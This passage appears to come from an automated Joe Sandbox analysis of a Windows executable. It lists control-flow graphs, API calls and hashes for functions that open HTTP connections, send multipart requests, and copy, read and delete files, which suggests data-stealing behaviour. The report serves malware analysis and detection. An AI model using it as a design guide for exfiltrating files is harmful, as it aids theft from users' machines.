                                                                                          control_flow_graph 1064 405150-40527d call 41a170 call 404800 call 418940 call 41a4a0 lstrlenA call 41a4a0 call 418940 call 41a110 * 5 InternetOpenA StrCmpCA 1087 405286-40528a 1064->1087 1088 40527f 1064->1088 1089 405290-4053a3 call 418600 call 41a2f0 call 41a270 call 41a1d0 * 2 call 41a380 call 41a2f0 call 41a380 call 41a270 call 41a1d0 * 3 call 41a380 call 41a2f0 call 41a270 call 41a1d0 * 2 InternetConnectA 1087->1089 1090 405914-4059a9 InternetCloseHandle call 418430 * 2 call 41a410 * 4 call 41a170 call 41a1d0 * 5 call 401550 call 41a1d0 1087->1090 1088->1087 1089->1090 1153 4053a9-4053b7 1089->1153 1154 4053c5 1153->1154 1155 4053b9-4053c3 1153->1155 1156 4053cf-405401 HttpOpenRequestA 1154->1156 1155->1156 1157 405907-40590e InternetCloseHandle 1156->1157 1158 405407-405881 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a4a0 lstrlenA call 41a4a0 lstrlenA GetProcessHeap HeapAlloc call 41a4a0 lstrlenA call 41a4a0 memcpy call 41a4a0 lstrlenA memcpy call 41a4a0 lstrlenA call 41a4a0 * 2 lstrlenA memcpy call 41a4a0 lstrlenA call 41a4a0 HttpSendRequestA call 418430 1156->1158 1157->1090 1312 405886-4058b0 InternetReadFile 1158->1312 1313 4058b2-4058b9 1312->1313 1314 4058bb-405901 InternetCloseHandle 1312->1314 1313->1314 1315 4058bd-4058fb call 41a380 call 41a270 call 41a1d0 1313->1315 1314->1157 1315->1312
                                                                                          APIs
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404868
                                                                                            • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                            • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004051E3
                                                                                            • Part of subcall function 00418940: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000), ref: 00418960
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
                                                                                          • StrCmpCA.SHLWAPI(?,0081C7C8), ref: 00405275
                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
                                                                                          • HttpOpenRequestA.WININET(00000000,0081C648,?,0081BC80,00000000,00000000,00400100,00000000), ref: 004053F4
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,0081C698,00000000,?,007F1B50,00000000,?,00421980,00000000,?,00414CAF), ref: 00405787
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040579B
                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 004057B3
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004057C8
                                                                                          • memcpy.MSVCRT ref: 004057DF
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
                                                                                          • memcpy.MSVCRT ref: 00405806
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00405818
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
                                                                                          • memcpy.MSVCRT ref: 00405841
                                                                                          • lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00405901
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040590E
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00405918
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                          • String ID: ------$"$"$"$--$------$------$------
                                                                                          • API String ID: 2633831070-2774362122
                                                                                          • Opcode ID: bb7fc4e696f29f5ba21758e4b924d8e081b032445cd9c81e652ebb9516fe89ca
                                                                                          • Instruction ID: 1d52745d65e853cf4120aa405e943018ad764f54ae2154c0ea3196726ecd4ecf
                                                                                          • Opcode Fuzzy Hash: bb7fc4e696f29f5ba21758e4b924d8e081b032445cd9c81e652ebb9516fe89ca
                                                                                          • Instruction Fuzzy Hash: 8E325071921118ABCB14EBA1DC55FEEB338BF54314F40419EF50662192EF782B98CF6A
                                                                                          Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493networkstringmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1323 4059b0-405a6b call 41a170 call 404800 call 41a110 * 5 InternetOpenA StrCmpCA 1338 405a74-405a78 1323->1338 1339 405a6d 1323->1339 1340 406013-40603b InternetCloseHandle call 41a4a0 call 409b10 1338->1340 1341 405a7e-405bf6 call 418600 call 41a2f0 call 41a270 call 41a1d0 * 2 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a2f0 call 41a270 call 41a1d0 * 2 InternetConnectA 1338->1341 1339->1338 1350 40607a-4060e5 call 418430 * 2 call 41a170 call 41a1d0 * 5 call 401550 call 41a1d0 1340->1350 1351 40603d-406075 call 41a1f0 call 41a380 call 41a270 call 41a1d0 1340->1351 1341->1340 1425 405bfc-405c0a 1341->1425 1351->1350 1426 405c18 1425->1426 1427 405c0c-405c16 1425->1427 1428 405c22-405c55 HttpOpenRequestA 1426->1428 1427->1428 1429 406006-40600d InternetCloseHandle 1428->1429 1430 405c5b-405f7f call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a4a0 lstrlenA call 41a4a0 lstrlenA GetProcessHeap HeapAlloc call 41a4a0 lstrlenA call 41a4a0 memcpy call 41a4a0 lstrlenA call 41a4a0 * 2 lstrlenA memcpy call 41a4a0 lstrlenA call 41a4a0 HttpSendRequestA 1428->1430 1429->1340 1539 405f85-405faf InternetReadFile 1430->1539 1540 405fb1-405fb8 1539->1540 1541 405fba-406000 InternetCloseHandle 1539->1541 1540->1541 1542 405fbc-405ffa call 41a380 call 41a270 call 41a1d0 1540->1542 1541->1429 1542->1539
                                                                                          APIs
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
                                                                                            • Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404868
                                                                                            • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                            • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
                                                                                          • StrCmpCA.SHLWAPI(?,0081C7C8), ref: 00405A63
                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0081C748,00000000,?,007F1B50,00000000,?,004219C0), ref: 00405EC1
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00405ED2
                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00405EEA
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00405EFF
                                                                                          • memcpy.MSVCRT ref: 00405F16
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00405F28
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
                                                                                          • memcpy.MSVCRT ref: 00405F4E
                                                                                          • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
                                                                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00406000
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0040600D
                                                                                          • HttpOpenRequestA.WININET(00000000,0081C648,?,0081BC80,00000000,00000000,00400100,00000000), ref: 00405C48
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00406017
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                          • String ID: "$"$------$------$------$XA$XA
                                                                                          • API String ID: 148854478-2501203334
                                                                                          • Opcode ID: 974ef60541471f5251777ea60b144edf994a377a0aebfdf0e512de411ba153aa
                                                                                          • Instruction ID: fd4032899b6f210ca5ed4ade58f42d7f74ab7cfcec1a01a64090ede90c3e384c
                                                                                          • Opcode Fuzzy Hash: 974ef60541471f5251777ea60b144edf994a377a0aebfdf0e512de411ba153aa
                                                                                          • Instruction Fuzzy Hash: 4C123F71921118ABCB14EBA1DC95FEEB338BF14314F40419EF50662191EF782B99CF69
                                                                                          Function 0040A6C0 Relevance: 32.0, APIs: 21, Instructions: 494stringmemoryfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1907 40a6c0-40a6dc call 41a440 1910 40a6ed-40a701 call 41a440 1907->1910 1911 40a6de-40a6eb call 41a1f0 1907->1911 1917 40a712-40a726 call 41a440 1910->1917 1918 40a703-40a710 call 41a1f0 1910->1918 1916 40a74d-40a7b8 call 41a110 call 41a380 call 41a270 call 41a1d0 call 418600 call 41a2f0 call 41a270 call 41a1d0 * 2 1911->1916 1950 40a7bd-40a7c4 1916->1950 1917->1916 1926 40a728-40a748 call 41a1d0 * 3 call 401550 1917->1926 1918->1916 1944 40ad65-40ad68 1926->1944 1951 40a800-40a814 call 41a110 1950->1951 1952 40a7c6-40a7e2 call 41a4a0 * 2 CopyFileA 1950->1952 1957 40a8c1-40a9a4 call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a380 call 41a270 call 41a1d0 * 2 1951->1957 1958 40a81a-40a8bc call 41a380 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 call 41a2f0 call 41a270 call 41a1d0 call 41a380 call 41a270 call 41a1d0 1951->1958 1965 40a7e4-40a7fe call 41a170 call 418f70 1952->1965 1966 40a7fc 1952->1966 2016 40a9a9-40a9c1 call 41a4a0 1957->2016 1958->2016 1965->1950 1966->1951 2025 40ad16-40ad28 call 41a4a0 DeleteFileA call 41a410 2016->2025 2026 40a9c7-40a9e5 2016->2026 2037 40ad2d-40ad60 call 41a410 call 41a1d0 * 5 call 401550 2025->2037 2035 40a9eb-40a9ff GetProcessHeap RtlAllocateHeap 2026->2035 2036 40acfc-40ad0c 2026->2036 2038 40aa02-40aa12 2035->2038 2044 40ad13 2036->2044 2037->1944 2045 40ac91-40ac9e lstrlenA 2038->2045 2046 40aa18-40aaba call 41a110 * 6 call 41a440 2038->2046 2044->2025 2047 40aca0-40acd5 lstrlenA call 41a170 call 401590 call 414c70 2045->2047 2048 40aceb-40acf9 memset 2045->2048 2086 40aabc-40aacb call 41a1f0 2046->2086 2087 40aacd-40aad6 call 41a1f0 2046->2087 2064 40acda-40ace6 call 41a1d0 2047->2064 2048->2036 2064->2048 2091 40aadb-40aaed call 41a440 2086->2091 2087->2091 2094 40ab00-40ab09 call 41a1f0 2091->2094 2095 40aaef-40aafe call 41a1f0 2091->2095 2099 40ab0e-40ab1e call 41a480 2094->2099 2095->2099 2102 40ab20-40ab28 call 41a1f0 2099->2102 2103 40ab2d-40ac8c call 41a4a0 lstrcat * 2 call 41a4a0 lstrcat * 2 call 41a4a0 lstrcat * 2 call 41a4a0 lstrcat * 2 call 41a4a0 lstrcat * 2 call 41a4a0 lstrcat * 2 call 409e60 call 41a4a0 lstrcat call 41a1d0 lstrcat call 41a1d0 * 6 2099->2103 2102->2103 2103->2038
                                                                                          APIs
                                                                                            • Part of subcall function 0041A440: StrCmpCA.SHLWAPI(00000000,00421414,0040CFE2,00421414,00000000), ref: 0041A45F
                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A9F2
                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040A9F9
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A7DA
                                                                                            • Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00816A50,?,004210DC,?,00000000), ref: 0041A1FB
                                                                                            • Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040AB3A
                                                                                          • lstrcat.KERNEL32(?,004212C4), ref: 0040AB49
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040AB5C
                                                                                          • lstrcat.KERNEL32(?,004212C8), ref: 0040AB6B
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040AB7E
                                                                                          • lstrcat.KERNEL32(?,004212CC), ref: 0040AB8D
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040ABA0
                                                                                          • lstrcat.KERNEL32(?,004212D0), ref: 0040ABAF
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040ABC2
                                                                                          • lstrcat.KERNEL32(?,004212D4), ref: 0040ABD1
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040ABE4
                                                                                          • lstrcat.KERNEL32(?,004212D8), ref: 0040ABF3
                                                                                            • Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
                                                                                            • Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
                                                                                            • Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040AC3C
                                                                                          • lstrcat.KERNEL32(?,004212DC), ref: 0040AC56
                                                                                          • lstrlenA.KERNEL32(?), ref: 0040AC95
                                                                                          • lstrlenA.KERNEL32(?), ref: 0040ACA4
                                                                                          • memset.MSVCRT ref: 0040ACF3
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040AD1F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                          • String ID:
                                                                                          • API String ID: 2228671196-0
                                                                                          • Opcode ID: 80f3b5ba9da17a652e14cf4d5229dca36dc21a3f3d02acdc161b99393af0e2b3
                                                                                          • Instruction ID: db3bf564d8a269597709baab17c241dc92c2864a2a44399f5d1cb95b81495e87
                                                                                          • Opcode Fuzzy Hash: 80f3b5ba9da17a652e14cf4d5229dca36dc21a3f3d02acdc161b99393af0e2b3
                                                                                          • Instruction Fuzzy Hash: 13029371901108ABCB14EBA1DC96EEE7339BF54314F10416EF507B20A1DF786E99CB6A
                                                                                          Function 0040CD30 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 00418600: GetSystemTime.KERNEL32(?,007F1C10,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CDC3
                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040CF07
                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040CF0E
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040D048
                                                                                          • lstrcat.KERNEL32(?,0042141C), ref: 0040D057
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040D06A
                                                                                          • lstrcat.KERNEL32(?,00421420), ref: 0040D079
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040D08C
                                                                                          • lstrcat.KERNEL32(?,00421424), ref: 0040D09B
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040D0AE
                                                                                          • lstrcat.KERNEL32(?,00421428), ref: 0040D0BD
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040D0D0
                                                                                          • lstrcat.KERNEL32(?,0042142C), ref: 0040D0DF
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040D0F2
                                                                                          • lstrcat.KERNEL32(?,00421430), ref: 0040D101
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 0040D114
                                                                                          • lstrcat.KERNEL32(?,00421434), ref: 0040D123
                                                                                            • Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00816A50,?,004210DC,?,00000000), ref: 0041A1FB
                                                                                            • Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255
                                                                                          • lstrlenA.KERNEL32(?), ref: 0040D16A
                                                                                          • lstrlenA.KERNEL32(?), ref: 0040D179
                                                                                          • memset.MSVCRT ref: 0040D1C8
                                                                                            • Part of subcall function 0041A440: StrCmpCA.SHLWAPI(00000000,00421414,0040CFE2,00421414,00000000), ref: 0041A45F
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040D1F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
